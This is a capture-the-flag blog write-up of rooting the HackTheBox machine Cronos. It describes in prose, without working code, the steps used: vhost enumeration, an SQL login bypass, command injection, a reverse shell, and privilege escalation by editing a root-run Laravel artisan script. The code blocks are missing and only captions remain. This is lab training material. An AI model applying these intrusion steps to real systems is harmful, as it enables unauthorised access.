Introduction

Today I explore Cronos from HTB; an OSCP like box featuring some vhost enumeration, SQL login bypass techniques and command injection. Once on the box we use a Laravel script for privilege escalation. I started this box off by directly visiting the IP in a web browser as the majority of boxes on HTB have the main point via web. Arriving at the page I see an Apache configuration page. Immediately I begin running a vhost scan:

Copy
Found admin.cronos.htb with a VHOST search.

Found admin.cronos.htb with a VHOST search.

I edit my hosts file and go to the admin URL. When I arrive I am presented with a login screen. I run a gobuster scan looking for additional pages/files and trying a few SQL login bypass techniques. One works and I am able to access the panel.

Login page presented.

Login page presented.

Bypass the login page with a comment.

Bypass the login page with a comment.

Copy
Also found through gobuster you can run commands on Welcome without needing to be logged in.

Also found through gobuster you can run commands on Welcome without needing to be logged in.

I see a Net Tool page running and doing some baseline commands. I use Burp to catch the request and try a few commands to see if I have command execution:

Direct command injection to the host?

Direct command injection to the host?

Finding out where/who I am and which python/nc binaries are available.

Finding out where/who I am and which python/nc binaries are available.

Seeing I can send commands I use a reverse shell one-liner to get a shell to the machine. PayloadAllTheThings has a great resource for this.

Copy

On the box I run LinPEAS which shows me a possible escalation point:

LinPEAS showing artisan being a pivot point.

LinPEAS showing artisan being a pivot point.

I navigated over to the artisan file mentioned and reviewed the script. I added my PHP reverse shell one-liner (also mentioned in the same article noted above) and saved the file. I started up a local nc session and waited. The shell spawned a moment later and I grabbed root.

Copy
Altering artisan file to catch the shell.

Altering artisan file to catch the shell.

Copy
Rooted cronos with Proof.

Rooted cronos with Proof.

Rooted

Published On: October 17th, 2020 / Categories: HTB, Technology / Tags: , , /

Leave A Comment